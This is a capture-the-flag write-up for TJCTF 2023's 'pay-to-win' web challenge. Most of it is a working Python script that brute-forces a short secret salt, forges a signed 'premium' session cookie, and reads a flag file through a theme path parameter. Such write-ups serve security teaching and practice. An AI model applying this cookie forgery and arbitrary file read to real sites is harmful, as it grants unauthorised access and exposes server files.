CTFtime.org

pay-to-win

by jpalayoor / c00k1e cptr

Rating:

Need to bypass this so need to bruteforce the 6 character key.

![image](https://github.com/jeromepalayoor/ctf-archive-hub/assets/63996033/0f5b034a-b483-47d4-aebb-2a332bbbba0b)

Getting premium allows us to load anything. Like the flag

![image](https://github.com/jeromepalayoor/ctf-archive-hub/assets/63996033/eca7551c-58cf-4dec-908c-9f22d5c519c0)

![image](https://github.com/jeromepalayoor/ctf-archive-hub/assets/63996033/493c079d-4191-4fad-b75a-76fe380942da)

```py
import requests
import hashlib
import itertools

characters = 'abcdefghijklmnopqrstuvwxyz0123456789'
length = 6
combinations = itertools.product(characters, repeat=length)

url = 'https://pay-to-win.tjc.tf/'

new = "eyJ1c2VybmFtZSI6ICJqZXJvbWUiLCAidXNlcl90eXBlIjogInByZW1pdW0ifQ==" #'{"username": "jerome", "user_type": "premium"}'
old = "eyJ1c2VybmFtZSI6ICJqZXJvbWUiLCAidXNlcl90eXBlIjogImJhc2ljIn0=" #'{"username": "jerome", "user_type": "basic"}'
h = "46378b50e362bb73a60886b2d55957b6a79acd1ae8d6069a7bce2fbbda3f640c"

def hash(data):
return hashlib.sha256(bytes(data, 'utf-8')).hexdigest()

actual_secret = ""
actual_hash = ""

for c in combinations:
secret = ''.join(c)
hashed = hash(old + secret)

if hashed == h:
actual_secret = secret
actual_hash = hash(new + secret)
break

print(actual_secret)
print(actual_hash)

r = requests.get(url + "?theme=/secret-flag-dir/flag.txt", cookies={'data': new, 'hash': actual_hash})

print(r.text)
```

Flag: `tjctf{not_random_enough_64831eff}`

Original writeup (https://jpalayoor.com/web/TJCTF-2023.html#pay-to-win).

Comments